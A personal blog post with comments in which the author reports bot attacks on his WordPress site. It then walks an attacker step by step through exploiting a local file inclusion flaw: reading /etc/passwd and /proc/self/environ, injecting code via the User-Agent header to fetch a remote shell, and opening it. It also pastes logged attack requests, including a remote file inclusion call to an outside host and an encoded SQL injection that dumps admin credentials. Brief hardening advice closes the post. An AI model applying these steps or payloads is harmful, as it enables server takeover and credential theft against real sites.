Recently i have a bad news. Beside the digital world is at war between piracy community and anti piracy company. My blog also being attack by unknown. In my opinion they are trying to find a vulnerability using a bot. They try to find a way to inject a malicious code using local file inclusion vulnerability.
How to inject malicious code using local file inclusion vulnerability:
- Check if the website have vulnerability:
www.website.com/view.php?page=contact.php.
If your target site have url like that then it’s a big possibility have LFI vulnerable.
- Change contact.php to ../ see if it has an error warning:
www.website.com/view.php?page=../
if you got error like this:
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/username/public_html/website.com/view.php on line 1337 [/bash] That's a big chance to inject a malicious code.
- Try find the /etc/passwd:
www.website.com/view.php?page=../../../../../etc/passwd
if it show like this:
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown...
Then you are ready to go to next step.
- Checking if proc/self/environ is accessible.
www.website.com/view.php?page=../../../../../proc/self/environ
If you get no error message and return a result like this:
DOCUMENT_ROOT=/home/username/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x [email protected] SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE= Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80 [/bash] Then proc/self/environ is accessible.If you got a blank page,an error proc/self/environ is not accessible or the OS is FreeBSD.
- Inject malicious code
Download tamper data firefox extension, change the User-Agent.Start Tamper Data in Firefox:
Request url: www.website.com/view.php?page=../../../../../proc/self/environ
User-Agent filed:
[/bash] Then submit the request. Our command will be executed (will download the txt shell from http://url-to-your malicious-code/ and will save it as shell.php in the website directory)
- Access your malicious code:
www.website.com/shell.php
With the technique here is the proove that i got attack:
GET /main.php?path=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.0 Connection: close Host: www.ivankristianto.com Te: deflate,gzip;q=0.3 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 X-Forwarded-For: 134.208.10.111 X-Real-Ip: 134.208.10.111 GET /main.php?path=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0 Connection: close Host: www.ivankristianto.com Te: deflate,gzip;q=0.3 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 X-Forwarded-For: 134.208.10.111 X-Real-Ip: 134.208.10.111 GET /main.php?path=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.0 Connection: close Host: www.ivankristianto.com Te: deflate,gzip;q=0.3 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 X-Forwarded-For: 134.208.10.111 X-Real-Ip: 134.208.10.111 GET /os/ubuntu/beginners-guide-how-to-use-wget/http:/ioputas.com/index.php?option=com_s5clanroster&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0 Connection: close Host: www.ivankristianto.com Te: deflate,gzip;q=0.3 User-Agent: libwww-perl/5.813 X-Forwarded-For: 89.187.142.150 X-Real-Ip: 89.187.142.150 GET /os/ubuntu/?_SERVER[DOCUMENT_ROOT]=http://amalocksmith.com/images/stories/fruit/.../walk1.gif?? HTTP/1.0 Connection: close Host: www.ivankristianto.com Te: deflate,gzip;q=0.3 User-Agent: Mozilla/5.0 X-Forwarded-For: 75.125.163.210 X-Real-Ip: 75.125.163.210 GET /search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxNDI6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfaWQsMHgzYSx1c2VyX25hbWUsMHgzYSxwYXNzd29yZCwnIlwnKSB1bmlvbiBzZWxlY3QgMiMiJyksMSBmcm9tIGFkbWluX3VzZXIgbGltaXQgMyMiO2k6Mjt9fQ== HTTP/1.0 Connection: close Host: www.ivankristianto.com X-Forwarded-For: 222.76.218.41 X-Real-Ip: 222.76.218.41 #Someone trying to inject with xmlrpc: GET /xmlrpc.php HTTP/1.0 Connection: close Host: www.ivankristianto.com Te: deflate,gzip;q=0.3 User-Agent: libwww-perl/5.837 X-Forwarded-For: 66.71.254.10 X-Real-Ip: 66.71.254.10
There are still lot of it. Speaking about security and vulnerability there are lot of ways to do it. So keep update your security (in this case i'm using WordPress), backup your data regularly and watch your log regularly. And i thanks for those who attack me, because of you i learn a new thing, and i'm trying find a way to hardening my security. Even i'm still a newbie in this area.
Thanks to:
WHM/CPanel
ClamAV
Wordpress plugin Bad Behavior
www.0x50sec.org
Very useful to know, I do php development as well and security is vital now-days.
You might be lucky enough to find the attack immediately, otherwise it might be very costly for your site. Please stay alert always to avoid this kind of activities.
I've email report about this attact to my blog. what is good plugins prevent this kind of attact ??
try bad behaviour and keep your WordPress and WordPress plugins up to date.